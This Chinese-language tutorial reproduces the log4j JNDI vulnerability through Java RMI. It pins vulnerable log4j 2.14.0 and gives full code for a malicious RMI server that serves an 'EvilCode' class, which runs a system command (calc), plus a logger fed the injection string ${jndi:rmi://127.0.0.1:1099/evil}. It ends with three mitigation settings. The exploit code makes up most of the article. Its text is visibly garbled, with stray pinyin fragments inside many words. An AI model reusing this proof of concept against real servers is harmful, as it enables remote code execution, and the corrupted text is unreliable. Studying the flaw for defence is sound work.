Java?RMI引起的log4j漏洞問(wèn)題分析

這篇文章主要介紹“Java RMI引起的log4j漏洞問(wèn)題分析”，在日常操作中，相信很多人在Java RMI引起的log4j漏洞問(wèn)題分析問(wèn)題上存在疑惑，小編查閱了各式資料，整理出簡(jiǎn)單好用的操作方法，希望對(duì)大家解答”Java RMI引起的log4j漏洞問(wèn)題分析”的疑惑有所幫助！接下來(lái)，請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧！

RMI和JNDIRMI

• （Remote Method Invocation） 即Java遠(yuǎn)程方法調(diào)用，一種用于實(shí)現(xiàn)遠(yuǎn)程過(guò)程調(diào)用的應(yīng)用程序編程接口

• JNDI (Java Naming and Directory Interface)是一個(gè)應(yīng)用程序設(shè)計(jì)的API，為開(kāi)發(fā)人員提供了查找和訪問(wèn)各種命名和目錄服務(wù)的通用、統(tǒng)一的接口

• JNDI和RMI的主要關(guān)系是RMI注冊(cè)的服務(wù)可以通過(guò)JNDIAPI訪問(wèn)。在討論到Spring反序列化漏洞之前，先看看如果通過(guò)JNDI來(lái)調(diào)用RMI注冊(cè)的服務(wù)。

模擬漏洞重現(xiàn)

pom依賴(lài)

<dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <!--log4j2核心包-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

黑客端

/**
 * 構(gòu)建RMI服務(wù)來(lái)響應(yīng)惡意代碼
 * <p>
 * Java RMI，即 遠(yuǎn)程方法調(diào)用（Remote Method Invocation），一種用于實(shí)現(xiàn)遠(yuǎn)程過(guò)程調(diào)用(RPC)的Java API， 能直接傳輸序列化后的Java對(duì)象和分布式垃圾收集。它的實(shí)現(xiàn)依賴(lài)于(JVM)，因此它僅支持從一個(gè)JVM到另一個(gè)JVM的調(diào)用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主機(jī)上的遠(yuǎn)程對(duì)象注冊(cè)表Registry的實(shí)例,默認(rèn)端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java對(duì)象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把遠(yuǎn)程對(duì)象注冊(cè)到RMI注冊(cè)服務(wù)器上，并命名為evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 執(zhí)行任意的腳本，目前的腳本會(huì)使windows服務(wù)器打開(kāi)計(jì)算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服務(wù)器將執(zhí)行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

網(wǎng)站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模擬填寫(xiě)數(shù)據(jù),輸入構(gòu)造好的字符串,使受害服務(wù)器打印日志時(shí)執(zhí)行遠(yuǎn)程的代碼 同一臺(tái)可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印業(yè)務(wù)日志
    logger.error("username:{}", username);

  }
}

【緊急補(bǔ)救措施3選1】

• 修改 JVM 參數(shù) -Dlog4j2.formatMsgNoLookups=true

• 修改配置 log4j2.formatMsgNoLookups=True

• 將系統(tǒng)環(huán)境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設(shè)置為 true

到此，關(guān)于“Java RMI引起的log4j漏洞問(wèn)題分析”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí)，請(qǐng)繼續(xù)關(guān)注億速云網(wǎng)站，小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章！